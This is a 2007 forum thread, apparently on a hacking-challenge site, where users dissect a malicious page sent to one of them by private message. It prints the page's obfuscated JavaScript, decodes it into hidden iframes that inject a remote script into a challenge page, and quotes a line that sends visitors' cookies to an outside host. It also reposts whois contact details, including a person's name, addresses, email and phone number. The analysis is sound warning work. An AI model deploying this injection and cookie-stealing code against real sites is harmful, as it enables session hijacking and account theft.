Author | Post | |||
unknown user |
some nobody registered an account, to send me a pm, and trick me in going to a webpage the webpage itself was nothing more than some lame javascript exploit, i didn't even bother to disect it, have fun <center>This site was removed.</center> <script type="text/javascript"> function CA9EBC9067A1A3B4DA21ED549CC195(E6C54EFB7B7C634244312B243){ function F645E88B3262503F555C823E7274(){ return 16; } return(parseInt(E6C54EFB7B7C634244312B243,F645E88B3262503F555C823E7274())); } function F3EC4FA958E96D04C01772D(AE2DF00C9F45DE9BB19C82CD0FE07){ var A10B295E47E54F6DB474AB13D46E268B=""; for(F7E49DF95174BE5BD9817DF4298D5=0; F7E49DF95174BE5BD9817DF4298D5<AE2DF00C9F45DE9BB19C82CD0FE07.length; F7E49DF95174BE5BD9817DF4298D5+=2){ A10B295E47E54F6DB474AB13D46E268B+= (String.fromCharCode(CA9EBC9067A1A3B4DA21ED549CC195(AE2DF00C9F45DE9BB19C82CD0FE07.substr(F7E49DF95174BE5BD9817DF4298D5,2)))); } document.write(A10B295E47E54F6DB474AB13D46E268B); } F3EC4FA958E96D04C01772D("3C696672616D652077696474683D30206865696768743D30207374796C653D227669736962696C6974793A2068696464656E3B22207372633D22687474703A2F2F6272696768742D736861646F77732E6E65742F6368616C6C656E6765732F6578706C6F6974732F6578706C6F69745F6B616C6974727573742F646F6F722E7068703F62726F746865723D253030253232313233253230616E642532306B6579686F6C653D2532322533437363726970742532307372633D687474703A2F2F73777735342E636F6D2F312E68746D2533452533432F7363726970742533452532322F2A266B65793D313233267375626D69743D576973646F6D223E3C2F696672616D653E"); </script> <script type="text/javascript"> function AF634F6EC0791551A92AE42FFC(DE9548D549DF7A63CBB6){ function A55B5714950F036A6(){ return 16; } return(parseInt(DE9548D549DF7A63CBB6,A55B5714950F036A6())); } function BCFF1D71254515531C46F86A3(E71A091436ECDC2774B80351EF481){ var F72C6A26438F3FBE05BD176589=""; for(C1A1F29017FDA9F0720920327BFCF1=0; C1A1F29017FDA9F0720920327BFCF1<E71A091436ECDC2774B80351EF481.length; C1A1F29017FDA9F0720920327BFCF1+=2){ F72C6A26438F3FBE05BD176589+= (String.fromCharCode(AF634F6EC0791551A92AE42FFC(E71A091436ECDC2774B80351EF481.substr(C1A1F29017FDA9F0720920327BFCF1,2)))); } document.write(F72C6A26438F3FBE05BD176589); } BCFF1D71254515531C46F86A3("3C696672616D652077696474683D30206865696768743D30207374796C653D227669736962696C6974793A2068696464656E3B22207372633D22687474703A2F2F7777772E6272696768742D736861646F77732E6E65742F6368616C6C656E6765732F6578706C6F6974732F6578706C6F69745F6B616C6974727573742F646F6F722E7068703F62726F746865723D253030253232313233253230616E642532306B6579686F6C653D2532322533437363726970742532307372633D687474703A2F2F73777735342E636F6D2F312E68746D2533452533432F7363726970742533452532322F2A266B65793D313233267375626D69743D576973646F6D223E3C2F696672616D653E"); </script> who knows perhaps it even exploits bright shadows... the script never executed in my browser, anyway nice try. edit: added some newlines |
|||
19.12.2007 09:41:45 |
|
|||
quangntenemy |
WTF <iframe width="0" height="0" src="http://bright-shadows.net/challenges/exploits/exploit_kalitrust/door.php?brother=%00%22123%20and%20keyhole=%22%3Cscript%20src=http://sww54.com/1.htm%3E%3C/script%3E%22/*&key=123&submit=Wisdom" style="visibility: hidden;"> <html> <head/> <body/> </html> </iframe> <iframe width="0" height="0" src="http://www.bright-shadows.net/challenges/exploits/exploit_kalitrust/door.php?brother=%00%22123%20and%20keyhole=%22%3Cscript%20src=http://sww54.com/1.htm%3E%3C/script%3E%22/*&key=123&submit=Wisdom" style="visibility: hidden;"> <html> <head/> <body/> </html> </iframe> Didn't know MYSQL itself was XSS vulnerable. Don't think it will work inside iframe, but let's see if anyone got my cookie... |
|||
19.12.2007 10:00:49 |
|
|||
unknown user |
and this is where that pointed to document.location='http://shad0w.onlinehoster.net/gate/gate.php?str='+document.cookie; |
|||
19.12.2007 10:03:39 |
|
|||
unknown user |
this is the whois info of sww54.com Registrant: patitta pataya 90/5 Yingcha-roen village HatYai, Songkhla 90110 Thailand Registered through: Domains Priced Right Domain Name: SWW54.COM Created on: 26-Feb-07 Expires on: 26-Feb-08 Last Updated on: Administrative Contact: kaewkarn, veerasak vee_k@hotmail.com NiceStyle.com 21/33 Lakmuang rd.,T.Naimuang Muang, Surin 32000 Thailand (081) 967-1924 Technical Contact: kaewkarn, veerasak vee_k@hotmail.com NiceStyle.com 21/33 Lakmuang rd.,T.Naimuang Muang, Surin 32000 Thailand (081) 967-1924 Domain servers in listed order: DNS1.PREMIUMDNS.NET DNS2.PREMIUMDNS.NET |
|||
19.12.2007 10:15:07 |
|
|||
unknown user |
quang it's a viable exploit i would suggest you change your cookie |
|||
19.12.2007 10:22:45 |
|